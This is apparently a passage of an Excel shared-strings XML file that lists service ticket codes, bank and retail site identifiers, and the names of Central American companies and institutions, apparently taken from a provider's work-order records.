  <si>
    <t>336800006T</t>
  </si>
  <si>
    <t>90001906674T</t>
  </si>
  <si>
    <t>90001902693T</t>
  </si>
  <si>
    <t>F4515884</t>
  </si>
  <si>
    <t>880224OC</t>
  </si>
  <si>
    <t>815800001T</t>
  </si>
  <si>
    <t>DB &amp; GB ATMS Y SEGURIDAD DE GUATEMALA, LTDA. (XT)</t>
  </si>
  <si>
    <t>F4513968</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C654</t>
  </si>
  <si>
    <t>90001800781T</t>
  </si>
  <si>
    <t>F4521778</t>
  </si>
  <si>
    <t>F4521868</t>
  </si>
  <si>
    <t>F4513342</t>
  </si>
  <si>
    <t>F4518752</t>
  </si>
  <si>
    <t>47502530T</t>
  </si>
  <si>
    <t>F4519111</t>
  </si>
  <si>
    <t>835784OC</t>
  </si>
  <si>
    <t>IDG000571SV</t>
  </si>
  <si>
    <t>KIMBERLY MINERVA,GUARDADO DE ESCALANTE</t>
  </si>
  <si>
    <t>FH3412</t>
  </si>
  <si>
    <t>F4513343</t>
  </si>
  <si>
    <t>F4518827</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0356</t>
  </si>
  <si>
    <t>F4515267</t>
  </si>
  <si>
    <t>F4514021</t>
  </si>
  <si>
    <t>F4517730</t>
  </si>
  <si>
    <t>F4519236</t>
  </si>
  <si>
    <t>F4520231</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_SENAHU_ALTA_VERAPAZ</t>
  </si>
  <si>
    <t>F4520537</t>
  </si>
  <si>
    <t>F4521612</t>
  </si>
  <si>
    <t>47503200T</t>
  </si>
  <si>
    <t>F4522046</t>
  </si>
  <si>
    <t>F4522338</t>
  </si>
  <si>
    <t>F4515605</t>
  </si>
  <si>
    <t>FG9194G</t>
  </si>
  <si>
    <t>F4516495</t>
  </si>
  <si>
    <t>3740629ON</t>
  </si>
  <si>
    <t>F4517411</t>
  </si>
  <si>
    <t>F4517848</t>
  </si>
  <si>
    <t>316200002T</t>
  </si>
  <si>
    <t>DROGUERIA REFASA S.A.</t>
  </si>
  <si>
    <t>F4517403</t>
  </si>
  <si>
    <t>411700004T</t>
  </si>
  <si>
    <t>F4516244</t>
  </si>
  <si>
    <t>1720011OH</t>
  </si>
  <si>
    <t>ID1106037SV</t>
  </si>
  <si>
    <t>F4513262</t>
  </si>
  <si>
    <t>ID1320004SV</t>
  </si>
  <si>
    <t>F4517849</t>
  </si>
  <si>
    <t>F4518214</t>
  </si>
  <si>
    <t>F4518307</t>
  </si>
  <si>
    <t>F4519112</t>
  </si>
  <si>
    <t>F4519407</t>
  </si>
  <si>
    <t>F4520538</t>
  </si>
  <si>
    <t>F4522047</t>
  </si>
  <si>
    <t>F4513334</t>
  </si>
  <si>
    <t>F4516498</t>
  </si>
  <si>
    <t>457600002T</t>
  </si>
  <si>
    <t>SERVICIOS ADMINISTRATIVOS Y DE SOPORTE EMPRESARIAL, S.A.</t>
  </si>
  <si>
    <t>1707237OH</t>
  </si>
  <si>
    <t>OH1001072734</t>
  </si>
  <si>
    <t>727100015T</t>
  </si>
  <si>
    <t>ID1090004SV</t>
  </si>
  <si>
    <t>ALCALDIA MUNICIPAL DE SAN PEDRO MASAHUAT</t>
  </si>
  <si>
    <t>5111214ON</t>
  </si>
  <si>
    <t>F4522064</t>
  </si>
  <si>
    <t>F4516354</t>
  </si>
  <si>
    <t>F4516499</t>
  </si>
  <si>
    <t>884800001T</t>
  </si>
  <si>
    <t>F4513391</t>
  </si>
  <si>
    <t>F4514478</t>
  </si>
  <si>
    <t>F4515879</t>
  </si>
  <si>
    <t>201900007T</t>
  </si>
  <si>
    <t>PROTUNAC, S.A.</t>
  </si>
  <si>
    <t>490900011T</t>
  </si>
  <si>
    <t>1681931OH</t>
  </si>
  <si>
    <t>OH1001064281</t>
  </si>
  <si>
    <t>F4521674</t>
  </si>
  <si>
    <t>F4516525</t>
  </si>
  <si>
    <t>F4515566</t>
  </si>
  <si>
    <t>F4511749</t>
  </si>
  <si>
    <t>F4514010</t>
  </si>
  <si>
    <t>47500043T</t>
  </si>
  <si>
    <t>F4517406</t>
  </si>
  <si>
    <t>340500143T</t>
  </si>
  <si>
    <t>F4521675</t>
  </si>
  <si>
    <t>F4515565</t>
  </si>
  <si>
    <t>62900017T</t>
  </si>
  <si>
    <t>IP2001139SV</t>
  </si>
  <si>
    <t>905600001T</t>
  </si>
  <si>
    <t>IRIS YANILETH TOMAS RODRIGUEZ DE PEREZ</t>
  </si>
  <si>
    <t>F4512967</t>
  </si>
  <si>
    <t>F4513973</t>
  </si>
  <si>
    <t>584269OH</t>
  </si>
  <si>
    <t>OH1000552186/PROMOTORA COMERCIAL HONDURAS S.A. -</t>
  </si>
  <si>
    <t>F4520543</t>
  </si>
  <si>
    <t>F4520544</t>
  </si>
  <si>
    <t>F4516939</t>
  </si>
  <si>
    <t>364100066T</t>
  </si>
  <si>
    <t>F4514316</t>
  </si>
  <si>
    <t>38300541T</t>
  </si>
  <si>
    <t>F4514479</t>
  </si>
  <si>
    <t>F4513279</t>
  </si>
  <si>
    <t>F4517410</t>
  </si>
  <si>
    <t>F4519152</t>
  </si>
  <si>
    <t>F4521569</t>
  </si>
  <si>
    <t>F4521797</t>
  </si>
  <si>
    <t>CC_GMG_SV_T044_METROCENTRO</t>
  </si>
  <si>
    <t>IP2029305SV</t>
  </si>
  <si>
    <t>ENTRETENIMIENTOS DIVERSOS CONSTELACION S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4513281</t>
  </si>
  <si>
    <t>F4519105</t>
  </si>
  <si>
    <t>F4520213</t>
  </si>
  <si>
    <t>F4521637</t>
  </si>
  <si>
    <t>1275662OH</t>
  </si>
  <si>
    <t>F4522534</t>
  </si>
  <si>
    <t>ID1204056SV</t>
  </si>
  <si>
    <t>F4517060</t>
  </si>
  <si>
    <t>21322600SV</t>
  </si>
  <si>
    <t>PARRILLA CARRANZA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4515343</t>
  </si>
  <si>
    <t>F4517195</t>
  </si>
  <si>
    <t>626779OH</t>
  </si>
  <si>
    <t>F4513282</t>
  </si>
  <si>
    <t>F4517409</t>
  </si>
  <si>
    <t>F4520873</t>
  </si>
  <si>
    <t>F4521152</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_2572</t>
  </si>
  <si>
    <t>F4522188</t>
  </si>
  <si>
    <t>F4517062</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM2444</t>
  </si>
  <si>
    <t>CONTR0001756629OC</t>
  </si>
  <si>
    <t>PRODUCTIVE BUSINESS SOLUTIONS</t>
  </si>
  <si>
    <t>F4516918</t>
  </si>
  <si>
    <t>47200028T</t>
  </si>
  <si>
    <t>F4514485</t>
  </si>
  <si>
    <t>864731OH</t>
  </si>
  <si>
    <t>1103491OH</t>
  </si>
  <si>
    <t>616800001T</t>
  </si>
  <si>
    <t>F4522705</t>
  </si>
  <si>
    <t>F4512944</t>
  </si>
  <si>
    <t>697500001T</t>
  </si>
  <si>
    <t>F4516295</t>
  </si>
  <si>
    <t>806300151T</t>
  </si>
  <si>
    <t>F4517629</t>
  </si>
  <si>
    <t>1118505OH</t>
  </si>
  <si>
    <t>F4520858</t>
  </si>
  <si>
    <t>IP2339003SV</t>
  </si>
  <si>
    <t>F4516382</t>
  </si>
  <si>
    <t>90001911061T</t>
  </si>
  <si>
    <t>F4516930</t>
  </si>
  <si>
    <t>323800002T</t>
  </si>
  <si>
    <t>F4512932</t>
  </si>
  <si>
    <t>F4518899</t>
  </si>
  <si>
    <t>F4513771</t>
  </si>
  <si>
    <t>38300526T</t>
  </si>
  <si>
    <t>F4520122</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C632</t>
  </si>
  <si>
    <t>292900512T</t>
  </si>
  <si>
    <t>F4513992</t>
  </si>
  <si>
    <t>312200002T</t>
  </si>
  <si>
    <t>F4516443</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_4092</t>
  </si>
  <si>
    <t>25224500SV</t>
  </si>
  <si>
    <t>FONAT</t>
  </si>
  <si>
    <t>F4516932</t>
  </si>
  <si>
    <t>810900004T</t>
  </si>
  <si>
    <t>CC_CAMPERO_GT_INTERNET_C631</t>
  </si>
  <si>
    <t>F4512933</t>
  </si>
  <si>
    <t>F4521003</t>
  </si>
  <si>
    <t>F4524127</t>
  </si>
  <si>
    <t>F4523463</t>
  </si>
  <si>
    <t>F4525306</t>
  </si>
  <si>
    <t>5173495ON</t>
  </si>
  <si>
    <t>1439724OH</t>
  </si>
  <si>
    <t>26796688SV</t>
  </si>
  <si>
    <t>AUTOMAX, S.A. DE C.V.</t>
  </si>
  <si>
    <t>22542600SV</t>
  </si>
  <si>
    <t>AVICOLA SALVADORENA S.A. DE C.V.</t>
  </si>
  <si>
    <t>1259201OH</t>
  </si>
  <si>
    <t>AMWAY HONDURAS</t>
  </si>
  <si>
    <t>F4515974</t>
  </si>
  <si>
    <t>F4517296</t>
  </si>
  <si>
    <t>F4517749</t>
  </si>
  <si>
    <t>F4512934</t>
  </si>
  <si>
    <t>38300578T</t>
  </si>
  <si>
    <t>F4525337</t>
  </si>
  <si>
    <t>22126580SV</t>
  </si>
  <si>
    <t>INNOVATION LIFT SA DE CV</t>
  </si>
  <si>
    <t>F4517298</t>
  </si>
  <si>
    <t>F4517297</t>
  </si>
  <si>
    <t>F4513949</t>
  </si>
  <si>
    <t>90001908418T</t>
  </si>
  <si>
    <t>F4514831</t>
  </si>
  <si>
    <t>90001801321T</t>
  </si>
  <si>
    <t>F4524564</t>
  </si>
  <si>
    <t>F4525348</t>
  </si>
  <si>
    <t>F4513781</t>
  </si>
  <si>
    <t>F4513390</t>
  </si>
  <si>
    <t>F4513385</t>
  </si>
  <si>
    <t>F4514094</t>
  </si>
  <si>
    <t>F4512820</t>
  </si>
  <si>
    <t>F4515047</t>
  </si>
  <si>
    <t>21500026T</t>
  </si>
  <si>
    <t>ID1090002SV</t>
  </si>
  <si>
    <t>7300200T</t>
  </si>
  <si>
    <t>F4520831</t>
  </si>
  <si>
    <t>548400001T</t>
  </si>
  <si>
    <t>PANTALEON S.A.....</t>
  </si>
  <si>
    <t>F4521638</t>
  </si>
  <si>
    <t>F4521786</t>
  </si>
  <si>
    <t>F4521787</t>
  </si>
  <si>
    <t>F4514089</t>
  </si>
  <si>
    <t>F4517732</t>
  </si>
  <si>
    <t>F4518735</t>
  </si>
  <si>
    <t>F4520465</t>
  </si>
  <si>
    <t>IDG000609SV</t>
  </si>
  <si>
    <t>SSA SISTEMAS EL SALVADOR S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4516816</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0251</t>
  </si>
  <si>
    <t>F4519280</t>
  </si>
  <si>
    <t>90001902793T</t>
  </si>
  <si>
    <t>F4516424</t>
  </si>
  <si>
    <t>1682413OH</t>
  </si>
  <si>
    <t>F4516851</t>
  </si>
  <si>
    <t>F4514454</t>
  </si>
  <si>
    <t>CC_BANCO_AGRICOLA_SV_ATM_HOTEL_LAS_GUITARRAS_LA_LIBERTAD</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0082</t>
  </si>
  <si>
    <t>F4515091</t>
  </si>
  <si>
    <t>F4519417</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3088</t>
  </si>
  <si>
    <t>F4520278</t>
  </si>
  <si>
    <t>F4520467</t>
  </si>
  <si>
    <t>F4520468</t>
  </si>
  <si>
    <t>F4521781</t>
  </si>
  <si>
    <t>297400721T</t>
  </si>
  <si>
    <t>F4513821</t>
  </si>
  <si>
    <t>F4518722</t>
  </si>
  <si>
    <t>F4521349</t>
  </si>
  <si>
    <t>807525OH</t>
  </si>
  <si>
    <t>F4516481</t>
  </si>
  <si>
    <t>F4514313</t>
  </si>
  <si>
    <t>F4514312</t>
  </si>
  <si>
    <t>F4515300</t>
  </si>
  <si>
    <t>F4513850</t>
  </si>
  <si>
    <t>F4517541</t>
  </si>
  <si>
    <t>F4517797</t>
  </si>
  <si>
    <t>IP2149139SV</t>
  </si>
  <si>
    <t>F4518317</t>
  </si>
  <si>
    <t>F4516542</t>
  </si>
  <si>
    <t>F4513983</t>
  </si>
  <si>
    <t>F4516528</t>
  </si>
  <si>
    <t>F4517219</t>
  </si>
  <si>
    <t>F4517222</t>
  </si>
  <si>
    <t>F4517206</t>
  </si>
  <si>
    <t>IDG000102SV</t>
  </si>
  <si>
    <t>LA HIPOTECARIA SA DE CV</t>
  </si>
  <si>
    <t>62900011T</t>
  </si>
  <si>
    <t>F4516439</t>
  </si>
  <si>
    <t>592807OH</t>
  </si>
  <si>
    <t>F4516440</t>
  </si>
  <si>
    <t>592789OH</t>
  </si>
  <si>
    <t>F4517170</t>
  </si>
  <si>
    <t>F4518543</t>
  </si>
  <si>
    <t>F4520215</t>
  </si>
  <si>
    <t>F4522538</t>
  </si>
  <si>
    <t>90001908948T</t>
  </si>
  <si>
    <t>F4516343</t>
  </si>
  <si>
    <t>249600032T</t>
  </si>
  <si>
    <t>F4516854</t>
  </si>
  <si>
    <t>F4514015</t>
  </si>
  <si>
    <t>CONTR0001497943OC</t>
  </si>
  <si>
    <t>F4518789</t>
  </si>
  <si>
    <t>90001910048T</t>
  </si>
  <si>
    <t>1539703OH</t>
  </si>
  <si>
    <t>F4514106</t>
  </si>
  <si>
    <t>913000001T</t>
  </si>
  <si>
    <t>CENTRO CULTURAL DE ESPAÑA CULTURA HISPANICA</t>
  </si>
  <si>
    <t>F4518549</t>
  </si>
  <si>
    <t>F4515616</t>
  </si>
  <si>
    <t>F4516373</t>
  </si>
  <si>
    <t>518600OH</t>
  </si>
  <si>
    <t>810900005T</t>
  </si>
  <si>
    <t>F4512930</t>
  </si>
  <si>
    <t>F4512929</t>
  </si>
  <si>
    <t>90001900134T</t>
  </si>
  <si>
    <t>F4513319</t>
  </si>
  <si>
    <t>F4514075</t>
  </si>
  <si>
    <t>CC_BANTRAB_GT_AGENCIA_41</t>
  </si>
  <si>
    <t>292900168T</t>
  </si>
  <si>
    <t>ID1024277SV</t>
  </si>
  <si>
    <t>F4513516</t>
  </si>
  <si>
    <t>23191400SV</t>
  </si>
  <si>
    <t>F4520859</t>
  </si>
  <si>
    <t>47503308T</t>
  </si>
  <si>
    <t>3278974ON</t>
  </si>
  <si>
    <t>F4515618</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0047</t>
  </si>
  <si>
    <t>F4515171</t>
  </si>
  <si>
    <t>F4514794</t>
  </si>
  <si>
    <t>20559639</t>
  </si>
  <si>
    <t>F4521160</t>
  </si>
  <si>
    <t>5146413ON</t>
  </si>
  <si>
    <t>F4516933</t>
  </si>
  <si>
    <t>444400002T</t>
  </si>
  <si>
    <t>CREDI OPCIONES S.A.</t>
  </si>
  <si>
    <t>F4516834</t>
  </si>
  <si>
    <t>F4516934</t>
  </si>
  <si>
    <t>F4517661</t>
  </si>
  <si>
    <t>F4517664</t>
  </si>
  <si>
    <t>F4518375</t>
  </si>
  <si>
    <t>F4520372</t>
  </si>
  <si>
    <t>F4520737</t>
  </si>
  <si>
    <t>ID1053027SV</t>
  </si>
  <si>
    <t>F4524147</t>
  </si>
  <si>
    <t>F4524262</t>
  </si>
  <si>
    <t>F4524263</t>
  </si>
  <si>
    <t>CC_WALMART_CR_TIENDA_3070</t>
  </si>
  <si>
    <t>4702452ON</t>
  </si>
  <si>
    <t>F4516047</t>
  </si>
  <si>
    <t>F4516049</t>
  </si>
  <si>
    <t>F4520019</t>
  </si>
  <si>
    <t>1549231OH</t>
  </si>
  <si>
    <t>F4517658</t>
  </si>
  <si>
    <t>F4517933</t>
  </si>
  <si>
    <t>F4512936</t>
  </si>
  <si>
    <t>F4514062</t>
  </si>
  <si>
    <t>F4518896</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_AGENCIA_0509</t>
  </si>
  <si>
    <t>F4521712</t>
  </si>
  <si>
    <t>F4522939</t>
  </si>
  <si>
    <t>1721593OH</t>
  </si>
  <si>
    <t>F4516403</t>
  </si>
  <si>
    <t>90001910885T</t>
  </si>
  <si>
    <t>F4519347</t>
  </si>
  <si>
    <t>F4520075</t>
  </si>
  <si>
    <t>F4520071</t>
  </si>
  <si>
    <t>90001904634T</t>
  </si>
  <si>
    <t>F4520126</t>
  </si>
  <si>
    <t>CC_BANRURAL_GT_INTERNET_AGENCIA_0433</t>
  </si>
  <si>
    <t>IP2129151SV</t>
  </si>
  <si>
    <t>F4513993</t>
  </si>
  <si>
    <t>F4517692</t>
  </si>
  <si>
    <t>418000004T</t>
  </si>
  <si>
    <t>SOLUCIONES FORMALES EN SISTEMAS, S.A.</t>
  </si>
  <si>
    <t>F4518367</t>
  </si>
  <si>
    <t>F4518716</t>
  </si>
  <si>
    <t>F4520021</t>
  </si>
  <si>
    <t>5227755ON</t>
  </si>
  <si>
    <t>ON0000582643/ASOC. NIC. DE ING. Y ARQUITECTOS</t>
  </si>
  <si>
    <t>IP2211005SV</t>
  </si>
  <si>
    <t>F4525384</t>
  </si>
  <si>
    <t>672100030T</t>
  </si>
  <si>
    <t>90001906816T</t>
  </si>
  <si>
    <t>F4518373</t>
  </si>
  <si>
    <t>CONTR0002476606OC</t>
  </si>
  <si>
    <t>UNIDADES MOVILES AUTOMOTRICES S.A</t>
  </si>
  <si>
    <t>748700002T</t>
  </si>
  <si>
    <t>LOGISTICA NAVE</t>
  </si>
  <si>
    <t>F4524149</t>
  </si>
  <si>
    <t>F4524999</t>
  </si>
  <si>
    <t>F4516314</t>
  </si>
  <si>
    <t>F4517039</t>
  </si>
  <si>
    <t>IP2129148SV</t>
  </si>
  <si>
    <t>CC_IJSUD_GT_ESTACA_ESCUINTLA</t>
  </si>
  <si>
    <t>F4520720</t>
  </si>
  <si>
    <t>F4522937</t>
  </si>
  <si>
    <t>F4523488</t>
  </si>
  <si>
    <t>F4521002</t>
  </si>
  <si>
    <t>F4516316</t>
  </si>
  <si>
    <t>F4518892</t>
  </si>
  <si>
    <t>24453050SV</t>
  </si>
  <si>
    <t>F4520787</t>
  </si>
  <si>
    <t>924100002T</t>
  </si>
  <si>
    <t>INSTITUTO GUATEMALTECO DE SEGURIDAD SOCIAL..</t>
  </si>
  <si>
    <t>F4521641</t>
  </si>
  <si>
    <t>636306OH</t>
  </si>
  <si>
    <t>F4522903</t>
  </si>
  <si>
    <t>F4514551</t>
  </si>
  <si>
    <t>F4514655</t>
  </si>
  <si>
    <t>625900166T</t>
  </si>
  <si>
    <t>1710478OH</t>
  </si>
  <si>
    <t>F4516320</t>
  </si>
  <si>
    <t>F4518250</t>
  </si>
  <si>
    <t>F4518981</t>
  </si>
  <si>
    <t>F4519257</t>
  </si>
  <si>
    <t>47504255T</t>
  </si>
  <si>
    <t>F4525478</t>
  </si>
  <si>
    <t>F4518851</t>
  </si>
  <si>
    <t>F4520754</t>
  </si>
  <si>
    <t>8902014T</t>
  </si>
  <si>
    <t>F4516293</t>
  </si>
  <si>
    <t>90001907281T</t>
  </si>
  <si>
    <t>770600013T</t>
  </si>
  <si>
    <t>F4516442</t>
  </si>
  <si>
    <t>F4515165</t>
  </si>
  <si>
    <t>297400829T</t>
  </si>
  <si>
    <t>F4518530</t>
  </si>
  <si>
    <t>F4522154</t>
  </si>
  <si>
    <t>IP2142028SV</t>
  </si>
  <si>
    <t>F4523105</t>
  </si>
  <si>
    <t>F4526408</t>
  </si>
  <si>
    <t>F4526410</t>
  </si>
  <si>
    <t>CC_GYT_GT_AGENCIA_346</t>
  </si>
  <si>
    <t>F4515615</t>
  </si>
  <si>
    <t>F4515963</t>
  </si>
  <si>
    <t>F4515166</t>
  </si>
  <si>
    <t>F4516912</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0661</t>
  </si>
  <si>
    <t>90001905727T</t>
  </si>
  <si>
    <t>CC_GMG_SV_T004_UNICENTRO_SOYAPANGO</t>
  </si>
  <si>
    <t>5036521ON</t>
  </si>
  <si>
    <t>F4525995</t>
  </si>
  <si>
    <t>F4526107</t>
  </si>
  <si>
    <t>F4526113</t>
  </si>
  <si>
    <t>F4526132</t>
  </si>
  <si>
    <t>F4512805</t>
  </si>
  <si>
    <t>20558401</t>
  </si>
  <si>
    <t>F4512749</t>
  </si>
  <si>
    <t>20538256</t>
  </si>
  <si>
    <t>F4512974</t>
  </si>
  <si>
    <t>F4521884</t>
  </si>
  <si>
    <t>F4513603</t>
  </si>
  <si>
    <t>F4525996</t>
  </si>
  <si>
    <t>IDG000576SV</t>
  </si>
  <si>
    <t>F4526123</t>
  </si>
  <si>
    <t>679500001T</t>
  </si>
  <si>
    <t>CORPORACION CENTROAMERICANA DE NEGOCIOS E INVERSION, S.A.</t>
  </si>
  <si>
    <t>F4520457</t>
  </si>
  <si>
    <t>1188252OH</t>
  </si>
  <si>
    <t>F4513739</t>
  </si>
  <si>
    <t>292900196T</t>
  </si>
  <si>
    <t>F4517273</t>
  </si>
  <si>
    <t>F4518911</t>
  </si>
  <si>
    <t>349900019T</t>
  </si>
  <si>
    <t>90001904771T</t>
  </si>
  <si>
    <t>CC_CERVECERIA_GT_AGENCIA_MEGA_18</t>
  </si>
  <si>
    <t>F4522275</t>
  </si>
  <si>
    <t>CC_CALLEJA_SV_T_206</t>
  </si>
  <si>
    <t>F4512796</t>
  </si>
  <si>
    <t>20559140</t>
  </si>
  <si>
    <t>F4525523</t>
  </si>
  <si>
    <t>807900351T</t>
  </si>
  <si>
    <t>F4522079</t>
  </si>
  <si>
    <t>F4522455</t>
  </si>
  <si>
    <t>F4526010</t>
  </si>
  <si>
    <t>4741570ON</t>
  </si>
  <si>
    <t>F4526304</t>
  </si>
  <si>
    <t>F4520610</t>
  </si>
  <si>
    <t>F4516378</t>
  </si>
  <si>
    <t>F4523117</t>
  </si>
  <si>
    <t>F4523118</t>
  </si>
  <si>
    <t>ID1040048SV</t>
  </si>
  <si>
    <t>DIRECCION TECNICA CLARO</t>
  </si>
  <si>
    <t>8902648T</t>
  </si>
  <si>
    <t>F4525064</t>
  </si>
  <si>
    <t>ID1045107SV</t>
  </si>
  <si>
    <t>ID1183031SV</t>
  </si>
  <si>
    <t>QUIMICA NAVA SA DE CV</t>
  </si>
  <si>
    <t>F4516282</t>
  </si>
  <si>
    <t>F4517325</t>
  </si>
  <si>
    <t>CONTR0001457108OC</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM0490</t>
  </si>
  <si>
    <t>F4518591</t>
  </si>
  <si>
    <t>F4518592</t>
  </si>
  <si>
    <t>F4518593</t>
  </si>
  <si>
    <t>F4518715</t>
  </si>
  <si>
    <t>F4521764</t>
  </si>
  <si>
    <t>F4523121</t>
  </si>
  <si>
    <t>F4515141</t>
  </si>
  <si>
    <t>47503424T</t>
  </si>
  <si>
    <t>F4517760</t>
  </si>
  <si>
    <t>F4517754</t>
  </si>
  <si>
    <t>F4517991</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0186</t>
  </si>
  <si>
    <t>CC_WALMART_GT_TIENDA_0765</t>
  </si>
  <si>
    <t>F4516876</t>
  </si>
  <si>
    <t>ID1124139SV</t>
  </si>
  <si>
    <t>F4520716</t>
  </si>
  <si>
    <t>288700067T</t>
  </si>
  <si>
    <t>F4521096</t>
  </si>
  <si>
    <t>CC_DISTELSA_GT_CC_ESKALA_ROOSEVELTH</t>
  </si>
  <si>
    <t>IDG000438SV</t>
  </si>
  <si>
    <t>F4520783</t>
  </si>
  <si>
    <t>F4518254</t>
  </si>
  <si>
    <t>915800007T</t>
  </si>
  <si>
    <t>SECRETARIA NACIONAL DE ADMINISTRACION DE BIENES EN EXTINCION DE DOMINI</t>
  </si>
  <si>
    <t>F4513459</t>
  </si>
  <si>
    <t>1710051OH</t>
  </si>
  <si>
    <t>F4522902</t>
  </si>
  <si>
    <t>F4523416</t>
  </si>
  <si>
    <t>F4522938</t>
  </si>
  <si>
    <t>F4515157</t>
  </si>
  <si>
    <t>F4520751</t>
  </si>
  <si>
    <t>F4524461</t>
  </si>
  <si>
    <t>F4524943</t>
  </si>
  <si>
    <t>297702193T</t>
  </si>
  <si>
    <t>F4518237</t>
  </si>
  <si>
    <t>895700002T</t>
  </si>
  <si>
    <t>F4520398</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM5103</t>
  </si>
  <si>
    <t>F4514643</t>
  </si>
  <si>
    <t>701163OH</t>
  </si>
  <si>
    <t>F4516567</t>
  </si>
  <si>
    <t>701500001T</t>
  </si>
  <si>
    <t>ESTUARDO JOAQUIN OLIVARES RUIZ -- RED OPTIMA</t>
  </si>
  <si>
    <t>F4524651</t>
  </si>
  <si>
    <t>F4524786</t>
  </si>
  <si>
    <t>F4525431</t>
  </si>
  <si>
    <t>F4525435</t>
  </si>
  <si>
    <t>22988900SV</t>
  </si>
  <si>
    <t>COMPAÑIA SALVADOREÑA DE TELESERVICES, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4518700</t>
  </si>
  <si>
    <t>451318ON</t>
  </si>
  <si>
    <t>F4516796</t>
  </si>
  <si>
    <t>886686OH</t>
  </si>
  <si>
    <t>265900395T</t>
  </si>
  <si>
    <t>F4520914</t>
  </si>
  <si>
    <t>899229OH</t>
  </si>
  <si>
    <t>F4526167</t>
  </si>
  <si>
    <t>F4512762</t>
  </si>
  <si>
    <t>20538259</t>
  </si>
  <si>
    <t>F4512763</t>
  </si>
  <si>
    <t>20514865</t>
  </si>
  <si>
    <t>ID1105075SV</t>
  </si>
  <si>
    <t>F4513606</t>
  </si>
  <si>
    <t>F4512862</t>
  </si>
  <si>
    <t>IP2045170SV</t>
  </si>
  <si>
    <t>F4512769</t>
  </si>
  <si>
    <t>F4512748</t>
  </si>
  <si>
    <t>20538267</t>
  </si>
  <si>
    <t>20538258</t>
  </si>
  <si>
    <t>F4512768</t>
  </si>
  <si>
    <t>F4520406</t>
  </si>
  <si>
    <t>F4521993</t>
  </si>
  <si>
    <t>F4525153</t>
  </si>
  <si>
    <t>F4525490</t>
  </si>
  <si>
    <t>392100142T</t>
  </si>
  <si>
    <t>F4525496</t>
  </si>
  <si>
    <t>47502855T</t>
  </si>
  <si>
    <t>F4525728</t>
  </si>
  <si>
    <t>F4513788</t>
  </si>
  <si>
    <t>265900270T</t>
  </si>
  <si>
    <t>F4520433</t>
  </si>
  <si>
    <t>F4522206</t>
  </si>
  <si>
    <t>725527OH</t>
  </si>
  <si>
    <t>CC_TYT_GT_ATM1924</t>
  </si>
  <si>
    <t>F4522209</t>
  </si>
  <si>
    <t>ID1129054SV</t>
  </si>
  <si>
    <t>F4524370</t>
  </si>
  <si>
    <t>F4524371</t>
  </si>
  <si>
    <t>F4517306</t>
  </si>
  <si>
    <t>38300525T</t>
  </si>
  <si>
    <t>F4517307</t>
  </si>
  <si>
    <t>F4518297</t>
  </si>
  <si>
    <t>F4512802</t>
  </si>
  <si>
    <t>598200002T</t>
  </si>
  <si>
    <t>FARMACEUTICA MAR, S.A.</t>
  </si>
  <si>
    <t>F4522080</t>
  </si>
  <si>
    <t>F4512770</t>
  </si>
  <si>
    <t>F4517555</t>
  </si>
  <si>
    <t>1188325OH</t>
  </si>
  <si>
    <t>F4515548</t>
  </si>
  <si>
    <t>F4517308</t>
  </si>
  <si>
    <t>F4512798</t>
  </si>
  <si>
    <t>20559676</t>
  </si>
  <si>
    <t>F4512803</t>
  </si>
  <si>
    <t>F4520534</t>
  </si>
  <si>
    <t>24845640SV</t>
  </si>
  <si>
    <t>DIPOL S.A. DE C.V</t>
  </si>
  <si>
    <t>ID1032036SV</t>
  </si>
  <si>
    <t>F4525497</t>
  </si>
  <si>
    <t>1724402OH</t>
  </si>
  <si>
    <t>OH1000928110</t>
  </si>
  <si>
    <t>354300024T</t>
  </si>
  <si>
    <t>F4514716</t>
  </si>
  <si>
    <t>625900010T</t>
  </si>
  <si>
    <t>F4515552</t>
  </si>
  <si>
    <t>IP2050039SV</t>
  </si>
  <si>
    <t>F4522086</t>
  </si>
  <si>
    <t>1293014OH</t>
  </si>
  <si>
    <t>F4517549</t>
  </si>
  <si>
    <t>CC_AZTECA_GT_SUC004160</t>
  </si>
  <si>
    <t>F4513521</t>
  </si>
  <si>
    <t>F4521792</t>
  </si>
  <si>
    <t>F4521887</t>
  </si>
  <si>
    <t>413400001T</t>
  </si>
  <si>
    <t>858000001T</t>
  </si>
  <si>
    <t>GRUPO MESI. S.A.</t>
  </si>
  <si>
    <t>758500026T</t>
  </si>
  <si>
    <t>F4526274</t>
  </si>
  <si>
    <t>F4517012</t>
  </si>
  <si>
    <t>F4515619</t>
  </si>
  <si>
    <t>F4518410</t>
  </si>
  <si>
    <t>26221200SV</t>
  </si>
  <si>
    <t>F4522194</t>
  </si>
  <si>
    <t>ID1071051SV</t>
  </si>
  <si>
    <t>MULTIPACK, S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4524937</t>
  </si>
  <si>
    <t>F4526168</t>
  </si>
  <si>
    <t>25276000SV</t>
  </si>
  <si>
    <t>ID1045006SV</t>
  </si>
  <si>
    <t>ALUMINIO DE CENTROAMERICA S.A. DE C.V.</t>
  </si>
  <si>
    <t>F4526261</t>
  </si>
  <si>
    <t>447400017T</t>
  </si>
  <si>
    <t>298766ON</t>
  </si>
  <si>
    <t>ON0000336601/MINISTERIO DE ENERGIA Y MINAS</t>
  </si>
  <si>
    <t>F4516226</t>
  </si>
  <si>
    <t>F4516469</t>
  </si>
  <si>
    <t>EF00042OC</t>
  </si>
  <si>
    <t>OPERADORA DE BODEGAS DE C,R. S.A.</t>
  </si>
  <si>
    <t>90001907768T</t>
  </si>
  <si>
